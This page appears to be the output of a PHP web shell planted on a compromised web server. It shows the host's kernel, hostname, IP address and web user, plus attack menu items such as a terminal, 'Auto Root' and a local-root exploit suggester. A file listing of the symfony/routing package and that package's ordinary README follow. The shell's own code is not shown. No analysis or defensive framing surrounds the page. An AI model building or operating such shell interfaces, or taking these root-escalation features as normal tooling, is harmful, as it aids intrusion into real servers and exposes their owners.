Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.223.213.54
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp-musonza /
vendor /
symfony /
routing /
Delete
Unzip
Name
Size
Permission
Date
Action
Annotation
[ DIR ]
drwxr-xr-x
2021-01-27 09:09
DependencyInjection
[ DIR ]
drwxr-xr-x
2021-01-27 09:09
Exception
[ DIR ]
drwxr-xr-x
2021-01-27 09:09
Generator
[ DIR ]
drwxr-xr-x
2021-01-27 09:09
Loader
[ DIR ]
drwxr-xr-x
2021-01-27 09:09
Matcher
[ DIR ]
drwxr-xr-x
2021-01-27 09:09
CHANGELOG.md
10.38
KB
-rw-r--r--
2021-01-27 09:09
CompiledRoute.php
4.44
KB
-rw-r--r--
2021-01-27 09:09
LICENSE
1.04
KB
-rw-r--r--
2021-01-27 09:09
README.md
1.5
KB
-rw-r--r--
2021-01-27 09:09
RequestContext.php
6.75
KB
-rw-r--r--
2021-01-27 09:09
RequestContextAwareInterface.php
558
B
-rw-r--r--
2021-01-27 09:09
Route.php
14.79
KB
-rw-r--r--
2021-01-27 09:09
RouteCollection.php
7.68
KB
-rw-r--r--
2021-01-27 09:09
RouteCollectionBuilder.php
9.56
KB
-rw-r--r--
2021-01-27 09:09
RouteCompiler.php
14.69
KB
-rw-r--r--
2021-01-27 09:09
RouteCompilerInterface.php
779
B
-rw-r--r--
2021-01-27 09:09
Router.php
15.62
KB
-rw-r--r--
2021-01-27 09:09
RouterInterface.php
1.02
KB
-rw-r--r--
2021-01-27 09:09
composer.json
1.54
KB
-rw-r--r--
2021-01-27 09:09
Save
Rename
Routing Component ================= The Routing component maps an HTTP request to a set of configuration variables. Getting Started --------------- ``` $ composer require symfony/routing ``` ```php use App\Controller\BlogController; use Symfony\Component\Routing\Generator\UrlGenerator; use Symfony\Component\Routing\Matcher\UrlMatcher; use Symfony\Component\Routing\RequestContext; use Symfony\Component\Routing\Route; use Symfony\Component\Routing\RouteCollection; $route = new Route('/blog/{slug}', ['_controller' => BlogController::class]); $routes = new RouteCollection(); $routes->add('blog_show', $route); $context = new RequestContext(); // Routing can match routes with incoming requests $matcher = new UrlMatcher($routes, $context); $parameters = $matcher->match('/blog/lorem-ipsum'); // $parameters = [ // '_controller' => 'App\Controller\BlogController', // 'slug' => 'lorem-ipsum', // '_route' => 'blog_show' // ] // Routing can also generate URLs for a given route $generator = new UrlGenerator($routes, $context); $url = $generator->generate('blog_show', [ 'slug' => 'my-blog-post', ]); // $url = '/blog/my-blog-post' ``` Resources --------- * [Documentation](https://symfony.com/doc/current/routing.html) * [Contributing](https://symfony.com/doc/current/contributing/index.html) * [Report issues](https://github.com/symfony/symfony/issues) and [send Pull Requests](https://github.com/symfony/symfony/pulls) in the [main Symfony repository](https://github.com/symfony/symfony)